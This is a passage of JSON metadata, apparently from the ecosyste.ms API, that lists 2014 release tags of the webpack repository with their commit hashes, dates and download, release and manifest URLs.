beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7